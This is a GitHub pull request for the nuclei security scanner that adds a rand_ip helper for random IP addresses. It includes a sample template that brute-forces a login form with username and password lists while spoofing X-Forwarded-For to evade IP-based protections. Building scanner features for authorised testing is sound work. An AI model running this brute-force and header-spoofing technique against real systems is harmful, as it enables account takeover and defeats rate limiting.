Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Random IP Helper Function #1744

Merged
merged 3 commits into from
Mar 24, 2022
Merged

Conversation

skhalsa-sigsci
Copy link
Contributor

Proposed changes

This PR introduces a helper function called rand_ip that allows you to generate a random IPV4 or IPV6 address in each request from a user supplied CIDR range. The generated IP can be used in HTTP headers to bypass/defeat protection mechanisms. Examples of HTTP headers that could use the rand_ip function:

  • Client-IP
  • X-Forwared-For
  • TRUE-CLIENT-IP
  • HTTP_CLIENT_IP
  • HTTP_X_FORWARDED_FOR
  • HTTP_X_FORWARDED
  • HTTP_X_CLUSTER_CLIENT_IP
  • HTTP_FORWARDED_FOR
  • HTTP_FORWARDED

The following is an example request using the rand_ip function.

id: brute-force

info:
  name: ATO Brute Force
  author: skhalsa-sigsci
  severity: info
  description: ato brute force
  tags: ato,bruteforce

requests:

- payloads:
    username: nuclei/payloads/usernames.txt
    password: nuclei/payloads/passwords.txt
  
  attack: clusterbomb

  headers:
    X-Forwarded-For: '{{rand_ip("192.168.0.0/24")}}'

  raw:
  - |-
    POST /login HTTP/2
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*

    name={{username}}&password={{password}}

  stop-at-first-match: true
  matchers:
  - type: status
    status:
    - 406

Checklist

  • Pull request is created against the dev branch
  • All checks passed (lint, unit/integration/regression tests etc.) with my changes
  • I have added tests that prove my fix is effective or that my feature works
  • I have added necessary documentation (if appropriate)

@xstevens
Copy link
Contributor

Before we merge we wanted to expand upon this to accept multiple CIDRs. We're working on updating the code and tests.

commit b590de2
Author: Xavier Stevens <xstevens@users.noreply.github.com>
Date:   Wed Mar 23 08:29:37 2022 -0700

    Updated rand_ip to use variadic args

commit ea883be
Author: Xavier Stevens <xstevens@users.noreply.github.com>
Date:   Tue Mar 22 16:59:19 2022 -0700

    Updated rand_ip function to handle multiple CIDRs
@xstevens
Copy link
Contributor

This should be all set for review. We updated rand_ip to use variadic args.

@Mzack9999 Mzack9999 added the Type: Enhancement Most issues will probably ask for additions or changes. label Mar 23, 2022
@ehsandeep ehsandeep merged commit 9e7a323 into projectdiscovery:dev Mar 24, 2022
@skhalsa-sigsci skhalsa-sigsci deleted the randomip branch April 6, 2022 19:20
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Type: Enhancement Most issues will probably ask for additions or changes.
Projects
None yet
Development

Successfully merging this pull request may close these issues.

4 participants